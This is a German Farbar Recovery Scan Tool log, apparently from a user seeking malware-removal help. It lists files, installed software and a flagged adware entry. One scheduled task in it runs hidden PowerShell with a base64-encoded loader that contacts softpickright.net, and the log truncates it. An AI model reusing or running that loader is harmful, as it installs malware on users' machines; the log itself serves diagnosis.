2016-02-04 17:51 - 2015-12-25 01:59 - 00002640 _____ C:\Users\Deniz\AppData\Roaming\Microsoft\Windows\Start Menu\µTorrent.lnk
2016-02-04 17:51 - 2015-12-15 19:26 - 00001126 _____ C:\Users\Public\Desktop\OpenOffice 4.1.2.lnk
2016-02-04 17:51 - 2015-12-13 18:31 - 00002007 _____ C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
2016-02-04 17:51 - 2015-12-13 18:30 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-02-04 17:51 - 2015-12-13 18:30 - 00002118 _____ C:\Users\Public\Desktop\Acrobat Reader DC.lnk
2016-02-04 17:51 - 2015-12-12 02:33 - 00001579 _____ C:\Users\Public\Desktop\League of Legends.lnk
2016-02-04 17:51 - 2015-12-06 19:51 - 00002054 _____ C:\Users\Public\Desktop\Grand Theft Auto V.lnk
2016-02-04 17:51 - 2015-12-06 01:02 - 00000989 _____ C:\Users\Public\Desktop\LogMeIn Hamachi.lnk
2016-02-04 17:51 - 2015-12-05 15:19 - 00002636 _____ C:\Users\Public\Desktop\Skype.lnk
2016-02-04 17:51 - 2015-12-05 15:10 - 00000424 _____ C:\Users\Deniz\Desktop\Dieser PC.lnk
2016-02-04 17:51 - 2015-12-05 14:42 - 00001261 _____ C:\Users\Public\Desktop\APP Shop.lnk
2016-02-04 17:51 - 2015-12-05 14:37 - 00000952 _____ C:\Users\Public\Desktop\CPUID CPU-Z.lnk
2016-02-04 17:51 - 2015-12-05 14:29 - 00002387 _____ C:\Users\Deniz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-02-04 17:51 - 2015-12-05 14:19 - 00001552 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-02-04 17:51 - 2015-12-05 13:16 - 00001176 _____ C:\Users\Public\Desktop\Intel(R) Driver Update Utility.lnk
2016-02-04 17:51 - 2015-12-05 13:10 - 00001391 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2016-02-04 17:51 - 2015-12-05 12:45 - 00000973 _____ C:\Users\Public\Desktop\Steam.lnk
2016-02-04 17:51 - 2015-12-05 12:35 - 00001175 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-02-04 17:51 - 2015-12-05 12:35 - 00001157 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-02-04 17:48 - 2015-12-06 01:02 - 00000000 ____D C:\Users\Deniz\AppData\Local\LogMeIn Hamachi
2016-02-04 17:48 - 2015-12-05 14:25 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-02-04 17:47 - 2015-10-30 08:24 - 00000000 ___SD C:\WINDOWS\Downloaded Program Files
2016-02-04 17:11 - 2015-12-05 12:34 - 00004156 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{A861FFF4-1A3E-40DC-8BD4-F2D66CB55754}
2016-02-03 22:37 - 2014-11-21 04:42 - 00000551 _____ C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2016-02-03 22:37 - 2014-11-21 04:42 - 00000551 _____ C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2016-02-03 22:37 - 2014-11-21 04:42 - 00000549 _____ C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2016-02-03 22:37 - 2014-11-21 04:42 - 00000549 _____ C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2016-02-03 22:01 - 2015-12-29 05:57 - 00000000 ____D C:\Users\Deniz\AppData\Local\ElevatedDiagnostics
2016-02-03 21:39 - 2015-12-05 14:17 - 00000000 ____D C:\Users\Deniz
2016-02-03 21:39 - 2015-12-05 13:09 - 00000000 ____D C:\ProgramData\Package Cache
2016-02-03 00:42 - 2015-12-05 12:45 - 00000000 ____D C:\Program Files (x86)\Steam
2016-02-03 00:39 - 2015-12-09 23:17 - 00076888 _____ C:\WINDOWS\SysWOW64\PnkBstrA.exe
2016-02-03 00:38 - 2015-12-09 23:21 - 00282296 _____ C:\WINDOWS\SysWOW64\PnkBstrB.xtr
2016-02-03 00:38 - 2015-12-09 23:17 - 00282296 _____ C:\WINDOWS\SysWOW64\PnkBstrB.exe
2016-01-31 15:03 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\rescache
2016-01-31 09:38 - 2015-12-18 17:40 - 00000000 ____D C:\Users\Deniz\Desktop\Musik
2016-01-29 02:15 - 2015-10-30 08:21 - 00000000 ____D C:\WINDOWS\INF
2016-01-28 21:47 - 2015-10-30 08:24 - 00000000 ___SD C:\WINDOWS\system32\F12
2016-01-28 21:47 - 2015-10-30 08:24 - 00000000 ___RD C:\WINDOWS\PurchaseDialog
2016-01-28 21:47 - 2015-10-30 08:24 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-01-28 21:47 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-01-28 21:47 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-01-28 21:47 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-01-28 21:47 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-01-28 18:50 - 2015-10-30 08:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-01-25 19:31 - 2015-12-05 15:28 - 00000000 ____D C:\ProgramData\Oracle
2016-01-25 18:52 - 2015-12-05 15:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-25 18:52 - 2015-12-05 15:28 - 00000000 ____D C:\Program Files\Java
2016-01-25 18:51 - 2015-12-05 15:28 - 00110176 _____ (Oracle Corporation) C:\WINDOWS\system32\WindowsAccessBridge-64.dll
2016-01-25 18:51 - 2015-12-05 15:28 - 00000000 ____D C:\Users\Deniz\.oracle_jre_usage
2016-01-20 22:57 - 2015-12-05 15:19 - 00000000 ____D C:\ProgramData\Skype
2016-01-20 01:25 - 2015-12-05 15:19 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-01-15 21:45 - 2015-12-05 14:27 - 01799166 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-01-15 21:45 - 2015-10-30 19:35 - 00775524 _____ C:\WINDOWS\system32\perfh007.dat
2016-01-15 21:45 - 2015-10-30 19:35 - 00155338 _____ C:\WINDOWS\system32\perfc007.dat
2016-01-15 21:38 - 2015-12-05 12:35 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-01-14 22:27 - 2015-12-13 18:30 - 00003972 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2016-01-14 00:09 - 2015-12-09 21:56 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-01-14 00:07 - 2015-12-09 21:56 - 143671360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-01-11 21:54 - 2015-12-18 17:50 - 00000000 ____D C:\Users\Deniz\Desktop\Alben

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-02-03 21:54 - 2016-02-03 21:54 - 0000074 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
C:\Windows\Tasks\{080A0B47-0E05-0D05-7D11-7A097879110D}.job


Einige Dateien in TEMP:
====================
C:\Users\Deniz\AppData\Local\Temp\39FE.tmp.exe
C:\Users\Deniz\AppData\Local\Temp\6BEC.tmp.exe
C:\Users\Deniz\AppData\Local\Temp\ICReinstall_6BEC.tmp.exe
C:\Users\Deniz\AppData\Local\Temp\jre-8u71-windows-au.exe
C:\Users\Deniz\AppData\Local\Temp\JUM083IQM7.exe
C:\Users\Deniz\AppData\Local\Temp\UninstallModule.exe
C:\Users\Deniz\AppData\Local\Temp\xGaSJy6Yd2.exe


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-02-03 22:16

==================== Ende von FRST.txt ============================

Addition


Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:27-01-2016
durchgeführt von Deniz (2016-02-04 21:05:17)
Gestartet von C:\Users\Deniz\Downloads
Windows 10 Pro (X64) (2015-12-05 13:25:23)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-3986097363-2624585822-4063065306-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3986097363-2624585822-4063065306-503 - Limited - Disabled)
Deniz (S-1-5-21-3986097363-2624585822-4063065306-1001 - Administrator - Enabled) => C:\Users\Deniz
Gast (S-1-5-21-3986097363-2624585822-4063065306-501 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

µTorrent (HKU\S-1-5-21-3986097363-2624585822-4063065306-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 15.010.20056 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.286 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.3.183 - Adobe Systems, Inc.)
APP Shop v1.0.22 (HKLM-x32\...\{90242E9B-BC60-46E3-8EE7-8E953F702280}_is1) (Version: 1.0.22 - ASRock Inc.)
ARK: Survival Evolved (HKLM-x32\...\Steam App 346110) (Version:  - Studio Wildcard)
Arma 3 (HKLM-x32\...\Steam App 107410) (Version:  - Bohemia Interactive)
AVM FRITZ!WLAN (HKLM-x32\...\AVMWLANCLI) (Version: 1.2.0.0 - AVM Berlin)
Battlefield: Bad Company 2 (HKLM-x32\...\Steam App 24960) (Version:  - DICE)
Body Text Feathering (HKLM-x32\...\PopupProduct) (Version: 1.0.0.0 - Body Text Feathering) <==== ACHTUNG
Brawlhalla (HKLM-x32\...\Steam App 291550) (Version:  - Blue Mammoth Games)
Cossacks: Back to War (HKLM-x32\...\Steam App 4850) (Version:  - GSC Game World)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
CPUID CPU-Z 1.74 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
Dynasty Warriors 8 Xtreme Legends (HKLM-x32\...\Dynasty Warriors 8 Xtreme Legends_is1) (Version:  - )
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version:  - Facepunch Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.97 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Grand Theft Auto V (HKLM-x32\...\{E01FA564-2094-4833-8F2F-1FFEC6AFCC46}) (Version: "1.00.0000" - Rockstar Games)
Intel Driver Update Utility (HKLM-x32\...\{fe92d390-13ee-4660-a2f8-39a066fdffe0}) (Version: 2.2.0.5 - Intel)
Intel(R) Driver Update Utility 2.2.0.5 (x32 Version: 2.2.0.1 - Intel) Hidden
Java 8 Update 71 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418071F0}) (Version: 8.0.710.15 - Oracle Corporation)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games )
League of Legends (x32 Version: 3.0.1 - Riot Games ) Hidden
Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version:  - Valve)
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
Malwarebytes Anti-Malware Version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.266.3 - McAfee, Inc.)
Media Go (HKLM-x32\...\{65256C0D-3FE7-4D2E-BB3E-53F1175481C8}) (Version: 3.0.403 - Sony)
Media Go Network Downloader (HKLM-x32\...\{C52148B9-19E0-433A-9422-3451B1BEE20F}) (Version: 1.6.01.0 - Sony)
Media Go Video Playback Engine 2.20.102.05220 (HKLM-x32\...\{1EBB91B3-B277-3438-6125-C1C0281E02C7}) (Version: 2.20.102.05220 - Sony)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
MotioninJoy Gamepad tool 0.7.1001 (HKLM\...\{330DAC67-5B62-452A-A0E4-6B4A5923940F}_is1) (Version: 0.7.1001 - www.motioninjoy.com)
Mozilla Firefox 43.0.4 (x86 de) (HKLM-x32\...\Mozilla Firefox 43.0.4 (x86 de)) (Version: 43.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.4.5848 - Mozilla)
NVIDIA 3D Vision Controller-Treiber 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA 3D Vision Treiber 359.06 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 359.06 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.7.4.10 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.7.4.10 - NVIDIA Corporation)
NVIDIA Grafiktreiber 359.06 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 359.06 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA Miracast Virtueller Ton 359.06 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Miracast.VirtualAudio) (Version: 359.06 - NVIDIA Corporation)
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
NWZ-W270S WALKMAN Guide (HKLM-x32\...\{2DD336BD-D504-4AD7-AA03-201114C24495}) (Version: 2.2.0.07230 - Sony Corporation)
OpenOffice 4.1.2 (HKLM-x32\...\{F5CAB1AF-7B1A-4CEC-B829-A3F699473AE1}) (Version: 4.12.9782 - Apache Software Foundation)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version:  - OVERKILL - a Starbreeze Studio.)
Portal 2 (HKLM-x32\...\Steam App 620) (Version:  - Valve)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.988 - Even Balance, Inc.)
Rising Storm/Red Orchestra 2 Multiplayer (HKLM-x32\...\Steam App 35450) (Version:  - Tripwire Interactive)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.6.8 - Rockstar Games)
SHIELD Streaming (Version: 4.1.0240 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.7.4.10 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.18 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.109 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
The Elder Scrolls Online (HKLM-x32\...\The Elder Scrolls Online) (Version: 1.0.0.0 - Zenimax Online Studios)
WinRAR 5.30 (32-Bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-3986097363-2624585822-4063065306-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Deniz\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0815AA07-BBD1-431B-966D-AA277D680BFB} - System32\Tasks\{080A0B47-0E05-0D05-7D11-7A097879110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAbwBmAHQAcABpAGMAawByAGkAZwBoAHQALgBuAGUAdAAvAHUALwA/AGEAPQBxAEUAagBHAEQAaQBnAHQASQBHAEIALQBrAGYAawBvAFQATwBKADEASQB0AFkASgBYAHIAMwBWAEUASQA3AEwARgBlAEIAMgBfAGUAOQBKAG0AMQB0AF8AbgBHAF8ANABGAE0ANABNADIANABTAGYAbwBNAFIAWAA3AE8AbwBoAHAAaQB2AEUAZABQAHEAcwB2ADYAVABhAGUAOQB5AE8AdAAzAEsASgBwAGIAdABZAHcAbgBaAEIAMAB5ADAAaQBrAGwAVQBMAFMAaABvAFUAUgBOAGkAdQBlADEAcgBnAGwAbABVAEsAWgBXAGEAbABEADgAdABSAEkAbQBGADMAUQA5AFoAUAA2AF8AcgBiAGoAMAA2AFIAUQAtAEwAMgBzAHIAYwBBAHcAagBvAGUANABjAEkAWgBnAHkAQQBFADUAMwA0ADEAYgBIADQAUAB5AHAAVgBJAEoAUAA0ADgAdwB3AEMAMgBvAGUAVgBfAHcAawBZADcAMQBWAHQANAAtAG4AegBpADgAWgBsAGYAcwBzAE0ANgAtAEcAZgB3AHcAeABfAHUAUQBNAEIAMQBOAEEAVQBwAEEAUwBkADcAZAB2ADAAaQBHADEAQwBsAGEAUQBjAHYARgAwAHoAZQBjAEMAegB5AEUAeQByAE0AcABwAHcAQwA0AGcAQgBsAGsAZABVAF8AZABiAFAAMgB1AFQAWAA5AEwAVwB4AG8AaAA4ADMAVgBqAHgAawBTADgAdABkAG4AcgBJAFcAVABCAFQAUgBHAHkAbwAwADAAZwBDAEkALQBIAGIAQwBmAEgAZABRAE8AawBuAFkAbgBjADAATwBzADgARQBrAGUANAA5AEMAYQBiAGsATQB0AEMAaABvAFYAYgAwAGMANQBHADQAaQBMAGgAaABEAEwAbQBJAFcAeABzAC0AYgBRAHoAbABaAEcAdgBQAEQAVQBHAFIASgBWAEgAegBVAE4AZQBPAG8ARABtAHcAYQBsAFUASAB3AEQAcAAwAFoAZAByAFgATgBSAEwAWQA3AFIAdgBFAHUAegBwAEoARgBSAFoASgB6AHoAdQBkAFMAUQBsAGMANQA1AFAARABfADgARwBiADYASAByAEQAWgBuAFAAegBPAHMAaAA4AGMAWgBYAGQAMgBkAFIAWABxAGsANABwAGUATgBKADQAdgB1AEUAQQB5AE4AMABOAEQAWgA2AFQAUwBWAGsAcwBRAGUAMQBGADEARwBUAFcAaABRAGQAbAAzADEAZgB3AEoARgB6AEgAbwBZAHYARABKAHAAdQB1AFYAbwBHADYASwA4AHkAeQBhAGgAcABwAHgAcABqAFkAaABIAFkAYgBOAEkATgBxAHAAQwBQAHoAbwBkAGUATwBHAHYAQwBaAFkAMgA1AHQATwB2AGMASwBQAEgAcQAxADEAaQAyADMAcQBEAFEAOABDAHEANgBSAHAASQB0ADUAbABaAFMAVQBFAG4AMgBpAHMAeABEAHkAVAAzAGIAUABJAGYAOABIAHgARABBAEoAZAB1ADMAWQA4AEoAcQBXAEQAVABLADMAWABSAHYAQQA5AGkAbQB4ADIANQBQAEcAZgBsAFQAcwA1AEEAbgBpAEYATQBzAG4AXwBJAGkAUQB5AGkAQwBwADAAagBLAHIASQBKAFcASgBpAC0AVABXAEoANgBJAHEAeABoAEIAMwBTADgAcgB3AE0AYgBwAFkAagBPAE8AeAAwAGwAUwB4AGsAawByAC0AWgA0AFQAVgB5AFIAUgAwAFcAUAAtAE0AMQAxADcAbwBlADQAXwAxAEsAUgBPAGgARgBNAGwAdwBFAGcAcQBNADgAcgBoAGMAVgBZAGgAOQA5ADgASwBCAFYAaABVAEgAVwBpADUARwBmAGoANgAxAHEAOABwAHIAVQBEAE0ATQBXAFQAZQBmAHAARQBJADkAdgBJAEEAWQB2AC0AMgA0AHYAegBHADYAcgAyAEUAUABnAE8AMgB3AEcAdQBMAGQAYQBTAEEAVABUAE8ARABZADAAUgBQAHQAeABLAHkASABfAGcAeAB1AFUAUwBqAHgASwA3AG8AXwAxAHYAcABOADcASwBlAEkAVgBFAGIAMABKAFUAdgBwAG0AVAA2ADcASAAxAEIARABGADYAVQBSAEoAXwB1AEwAawBZADAATwBhAFUAMgBnAGMAMQBSAFgAZQBGAHAAdwBnACYAYwA9AHAATwBBAF8AUQB2ADYAVgBCADYAMwBXADQAUAAxAEEAVABhAHoAcgBpAHAAcwBNAGkAcgBmAG0ASgA4ADMARABmAGQAaQB3ADUAcABCAFMAWgBNAFYAYwB2AGgAXwB4AGkAVgAzAHUARAB0ADIANABuAFYARwBUADgAUgBKAEYAcwBFAFMAUgA5AEIATABCAEYATgBMAGMAUgBSAFAAaABWAG0ARABRAHIAcABmAF8AYwB3AFIALQBpADQAVQBXADQAbAAyAGoAawBFAHgAWgBRAHMAOQBXAHEAawBfAEkAbQBHAGgAbgAzAEkATwByAGkAZAByADcAWAB3ADQASQA0AGoAWgB5AGEATABvAEcATQBqAHMAWgBRAEMAUwBKAEQAMgBfAGQANgBlAHEASgB2AGIAaQBxAFkASABqADcARgAtAHcAcQBWAHkAMgBsAGYAUwBaAEUAZQBuADIAdwBzAEEANQBtAF8AbABBAGYAQwB4AHIAbwBWAFYAcAB4AFUAQwBSAHkASgBBADgAMQBBADYAWABOAGgAagBJADIAVQBZAFoASgBvAHYAaABjAHoAUQBMAEMAcwBpAHkAagBrAFQAdgBuAEIAXwBlAG8ANwBBAG0ASwBSAFgAMwB4AEIAbwBOAC0ARQBDAHQAOABPAEIATgAyAHUAeQAtAHkARwBDAGYAMwBVAG8ARgByAGsAUABuAGYANAAzADcARABXAFgAQQBGAGYASABYAFQANwByAGkAegBmAG0AZAB3AHEATgBoADcAdABMAFkAOQA3AEoAQgBEADkAcwB6AEEATgAtAEYAWgBNAFMARQBzAHkAMAB0AFkAWABKAGkAVgBWAHIAYgBpADcAMgA5AGwATABxADcAbQBuADgAVQBFADAAUwBaAC0AeQBmAFMARQBlAHAAeQBmAHoAZwAzAFcAcAB1AFEAagBwAHIAOABuADgAMwB0AGgAOQB6AHM